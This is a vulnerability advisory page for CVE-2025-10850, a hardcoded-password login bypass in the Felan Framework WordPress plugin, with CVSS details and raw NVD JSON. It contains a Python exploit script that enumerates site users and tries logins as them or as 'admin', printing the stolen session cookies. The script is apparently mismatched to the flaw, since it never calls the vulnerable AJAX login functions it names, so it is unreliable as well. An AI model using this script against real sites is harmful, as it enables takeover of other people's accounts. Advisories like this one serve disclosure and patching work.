Security Vulnerability Report
CVE-2025-10850 CVSS 9.8 CRITICAL

CVE-2025-10850

Published: 2025-10-16 07:15:33
Last Modified: 2026-04-15 00:35:42

Description

The Felan Framework plugin for WordPress is vulnerable to improper authentication in versions up to, and including, 1.1.4. This is due to the hardcoded password in the 'fb_ajax_login_or_register' function and in the 'google_ajax_login_or_register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, if they registered with facebook or google social login and did not change their password. CVE-2025-23504 is likely a duplicate of this issue.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Felan Framework <= 1.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10850 PoC - Felan Framework Hardcoded Password Authentication Bypass
# Vulnerability: Hardcoded password in fb_ajax_login_or_register and
#                google_ajax_login_or_register functions
# Affected: Felan Framework <= 1.1.4

import re

import requests

TARGET_URL = "http://target-wordpress-site.com"
# The hardcoded password found in plugin source code
HARDCODED_PASSWORD = "[HARDCODED_PASSWORD_FROM_SOURCE]"


def exploit_auth_bypass(target_url, username, password):
    """
    Exploit the hardcoded password vulnerability to authenticate as any user
    who registered via Facebook or Google social login.
    """
    session = requests.Session()

    # Step 1: Get the login page to retrieve any necessary cookies/nonce
    login_page = session.get(f"{target_url}/wp-login.php")

    # Step 2: Attempt login with the hardcoded password
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f'{target_url}/wp-admin/',
        'testcookie': '1',
    }

    # Step 3: Set the test cookie as required by WordPress
    session.cookies.set('wordpress_test_cookie', 'WP%20Cookie%20check')

    # Step 4: Submit login request
    response = session.post(
        f"{target_url}/wp-login.php",
        data=login_data,
        allow_redirects=False,
    )

    # Step 5: Check if login was successful. WordPress suffixes the auth
    # cookie name with a hash (wordpress_logged_in_<hash>), so match on the
    # prefix rather than on an exact key.
    cookie_names = session.cookies.get_dict().keys()
    if any(name.startswith('wordpress_logged_in') for name in cookie_names):
        print(f"[+] Successfully authenticated as: {username}")
        print(f"[+] Session cookies: {session.cookies.get_dict()}")
        return True
    elif response.status_code == 302 and 'wp-admin' in response.headers.get('Location', ''):
        print(f"[+] Login successful (redirect detected) as: {username}")
        return True
    else:
        print(f"[-] Login failed for: {username}")
        return False


def enumerate_and_exploit(target_url):
    """
    Enumerate WordPress users and attempt authentication bypass
    """
    session = requests.Session()

    # Enumerate users via author archive redirects (/?author=N -> /author/<name>/)
    for user_id in range(1, 20):
        try:
            resp = session.get(f"{target_url}/?author={user_id}")
            username_match = re.search(r'author/([^/]+)/', resp.url) if resp.url else None
            if username_match:
                username = username_match.group(1)
                print(f"[*] Found user: {username}")
                exploit_auth_bypass(target_url, username, HARDCODED_PASSWORD)
        except Exception:
            continue


if __name__ == "__main__":
    # Direct exploitation with known username
    exploit_auth_bypass(TARGET_URL, "admin", HARDCODED_PASSWORD)

    # Or enumerate and exploit all users
    # enumerate_and_exploit(TARGET_URL)
```

References

- https://themeforest.net/item/felan-freelance-marketplace-and-job-board-wordpress-theme/53612955
- https://www.wordfence.com/threat-intel/vulnerabilities/id/ab4c7656-544c-4f2f-a42f-264ac90e3b61?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10850",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-16T07:15:32.897",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Felan Framework plugin for WordPress is vulnerable to improper authentication in versions up to, and including, 1.1.4. This is due to the hardcoded password in the 'fb_ajax_login_or_register' function and in the 'google_ajax_login_or_register' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, if they registered with facebook or google social login and did not change their password. CVE-2025-23504 is likely a duplicate of this issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-798"}
        ]
      }
    ],
    "references": [
      {"url": "https://themeforest.net/item/felan-freelance-marketplace-and-job-board-wordpress-theme/53612955", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ab4c7656-544c-4f2f-a42f-264ac90e3b61?source=cve", "source": "[email protected]"}
    ]
  }
}
```